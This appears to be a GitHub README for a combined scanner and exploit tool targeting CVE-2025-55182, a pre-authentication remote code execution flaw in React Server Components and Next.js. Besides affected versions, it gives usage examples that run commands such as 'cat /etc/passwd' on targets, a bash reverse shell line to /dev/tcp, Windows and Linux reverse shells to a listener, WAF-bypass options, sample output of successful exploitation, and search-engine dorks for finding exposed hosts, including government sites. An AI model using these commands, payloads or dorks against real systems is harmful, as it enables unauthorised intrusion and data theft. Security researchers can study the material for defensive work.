This tool is designed for security researchers and penetration testers to detect and exploit the CVE-2025-55182 vulnerability in Next.js/React RSC applications. It provides multiple scanning modes, exploitation features, and WAF bypass techniques.
- π― Multiple Scanning Modes: Choose between
rce,safe, andvercel_bypassmodes. - π₯ Easy Exploitation: Execute commands or get a reverse shell on vulnerable targets.
- π Custom Payloads: Provide custom payloads as a string or from a file.
- π‘οΈ WAF Bypass: Techniques to bypass Web Application Firewalls.
- β‘ Fast and Concurrent: Scans multiple targets using asyncio.
- π Verbose Output: Polished and detailed output for easy debugging.
- π¨ Colored Output: For better readability.
- π€ Automated OS Detection: Automatically detects the target's operating system (Linux/Windows) for smarter exploitation, especially for reverse shells.
| Category | Information |
|---|---|
| Published | 2025-12-03 |
| Base Score | 10.0 (CRITICAL) |
| Researcher | Lachlan Davidson (https://github.com/lachlan2k) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Description | A critical Remote Code Execution (RCE) vulnerability in React Server Components. Applications using Reactβs server-side runtime including frameworks like Next.js are affected. The issue is caused by unsafe deserialization of untrusted βFlightβ protocol data, allowing an attacker to achieve pre-authentication code execution on the server. Updating to patched React and framework versions is required. |
| EPSS Score | 27.81% (Probability of exploitation) |
| CISA KEV Catalog | Listed: Yes, Ransomware: Unknown |
| HackerOne Hacktivity | Rank: 1, Reports: 92 |
| Patching Priority | A+ |
This vulnerability affects the following versions of React Server Components:
- React Server Components: 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- Next.js versions β₯14.3.0-canary.77, all 15.x, and 16.x
- frameworks using RSC: React Router (RSC mode), Waku, Redwood SDK, and various RSC plugins
The following packages are also affected:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack
git clone https://github.com/l0n3m4n/CVE-2025-55182.git
cd CVE-2025-55182
# Create a virtual environment
python3 -m venv venv-55182
source venv-55182/bin/activate
# Install dependencies
pip install -r requirements.txtβ― python3 CVE-2025-55182.py -h
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
[-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]
Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications
options:
-h, --help show this help message and exit
-u, --url URL Single URL to scan or exploit.
-f, --file FILE File containing a list of URLs to scan/exploit.
Exploitation Options:
-c, --command COMMAND Command to execute on the target(s).
-p, --payloads PAYLOAD Custom payload to execute on the target(s). Can be a string or a
file path.
-r, --reverse-shell LHOST:LPORT Attempt a reverse shell.
Scanning Options:
-sm, --scan-mode MODE Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
rce)
-wb, --waf-bypass Add junk data to the request to bypass WAFs.
-wbs, --waf-bypass-size KB Size of junk data in KB (default: 128).
-wbu, --waf-bypass-utf16le Use UTF-16LE encoding to bypass WAFs.
General Options:
-o, --output FILE File to save vulnerable URLs from scans.
-t, --threads NUM Number of concurrent threads (default: 10).
-T, --timeout SEC Request timeout in seconds (default: 10).
-P, --proxy URL Proxy to use (e.g., http://127.0.0.1:8080).
-H, --header HEADER Add custom headers (e.g., 'Cookie: session=...').
-v, --verbose Enable verbose output for success/failed/non-vulnerable checks.
rce(default): Active scan mode, executes anechocommand to confirm the vulnerability. This is the most reliable method, but it may leave logs on the target system.safe: Side-channel scan mode, does not execute commands. It checks for a specific error message (E{"digest") to determine if the target is vulnerable. This is safer thanrcemode, but may be less reliable.vercel_bypass: Uses a specific payload to bypass Vercel's WAF and checks for the command output in theX-Action-Redirectheader.
credit @coffinxp7
# Scan a single URL with the default rce check
python3 CVE-2025-55182.py -u http://target.com
# Scan a list of URLs with the `safe` mode and 20 threads
python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20
# Scan with Vercel WAF bypass mode and save vulnerable URLs to a file
python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"
# Use WAF bypass techniques
python3 CVE-2025-55182.py -u http://target.com -c "whoami" -wb
# Use a custom payload string
python3 CVE-2025-55182.py -u http://target.com -p "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"
# Use a custom payload from a file (windows target)
python3 CVE-2025-55182.py -u http://target.com -p windows_revshell.sh
# Get a reverse shell (linux default reverse shell)
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444
# Get a reverse shell using a payload file (linux target)
python3 CVE-2025-55182.py -u http://target.com -p linux_revshell.sh
# Force a windows reverse shell payload if auto-detection fails
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444 --os windows
# Intercept in Burpsuite
python3 CVE-2025-55182.py -u http://target.com -wbu -P http://127.0.0.1:8080
$ python3 CVE-2025-55182.py -u http://target.com__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[+] VULNERABLE: http://target.com (Mode: rce)$ python3 CVE-2025-55182.py -u http://target.com -v__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[+] VULNERABLE: http://target.com - Status: 500 (Mode: rce) (OS: Linux, Web Server: nginx/1.29.3)
Target Information:
Detected OS: Linux
Server Software: next.js
Content Type: text/html; charset=utf-8
System Time: Sat, 06 Dec 2025 19:59:32 GMT
Response snippet:
HTTP/1.1 500 Internal Server Error
Date: Sat, 06 Dec 2025 19:59:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4615
Connection: keep-alive
X-Powered-By: Next.js
ETag: W/"1207-I2098797987"
Vary: RSC, Next-Router-State-Tree
$ python3 CVE-2025-55182.py -u http://target.com -v__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[-] NOT VULNERABLE: https://tryhackme.com
[*] Verbose output for https://tryhackme.com:
Target Information:
Detected OS: Unknown
Server Software: cloudflare
Content Type: text/html; charset=UTF-8
System Time: Sat, 06 Dec 2025 19:59:32 GMT
Status Code: 500
Response Headers:
Date: Sat, 06 Dec 2025 19:59:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4615
Connection: keep-alive
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Referrer-Policy: same-origin
X-Frame-Options: SAMEORIGIN
Server: cloudflare
CF-RAY: 9a9e5d42b96204be-HKG
Response Body (first 500 chars):
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Worker threw exception | tryhackme.com | Cloudflare</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv
$ python3 CVE-2025-55182.py -u http://target.com -c "whoami && echo "" && cat /etc/passwd"__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Exploiting: https://target.com with command: whoami && echo "" && cat /etc/passwd
[+] COMMAND EXECUTED SUCCESSFULLY - Status: 500
----------------------------------------
nextjs
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
----------------------------------------$ python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444 -v__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Attempting reverse shell to 10.10.10.1:4444 from http://target.com
[*] Detected OS: Linux
[*] Using Linux (bash) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.$ python3 CVE-2025-55182.py -u http://windows-target.com -r 10.10.10.1:4444 -v__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Attempting reverse shell to 10.10.10.1:4444 from http://windows-target.com
[*] Detected OS: Windows
[*] Using Windows (powershell) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.β― python3 CVE-2025-55182.py -u http://target.com/apps -c "id && ls -al" -wbu
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Exploiting: http://target.com/apps with command: id && ls -al
[+] COMMAND EXECUTED SUCCESSFULLY - Status: 500 (Web Server: nginx/1.29.3)
----------------------------------------
3443983266
----------------------------------------
python3 CVE-2025-55182.py -u http://target.com:3000 -c "id" -v
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Exploiting: http://target.com:3000 with command: id
[-] FAILED TO EXECUTE COMMAND
[*] Verbose output for http://target.com:3000:
Status Code: -1
Response Headers:
(No headers received)
Response Body (first 200 chars):
An error occurred: HTTPConnectionPool(host='target.com', port=3000): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f846d6caa50>, 'CoThe tool comes with pre-made reverse shell payloads for Linux and Windows.
linux_revshell.sh: Bash reverse shell.windows_revshell.ps1: PowerShell reverse shell.
http.component:"next.js"http.favicon.hash:-1766382332(Vercel favicon)"x-powered-by: Next.js"
((Next.js) and services.software.product="Next.js") and services.port=3000services.http.response.body: "_next/static"host.services.endpoints.http.headers:(key:"Vary" and value:"RSC, Next-Router-State-Tree")
inurl:"/_next/static"intitle:"Next.js"site:com intitle:"Next.js"inurl:.com ("Next.js" OR "React")site:com ("Next.js" OR "_next/static")site:gov.cc ("Next.js" OR "React")site:com ("/_next/static" OR "/static/js")site:com ("React error" OR "Next.js error")
header:"x-powered-by: Next.js"
app:"Next.js"http.body="react.production.min.js" || http.body="React.createElement(" || app="React Router" || app="React.js"vul.cve="CVE-2025-55182"
app="NEXT.JS" || app="React.js"
This tool is intended for educational and research purposes only. Do not use it on any system without explicit permission. The author is not responsible for any damage caused by the use of this tool.
PR are welcome :)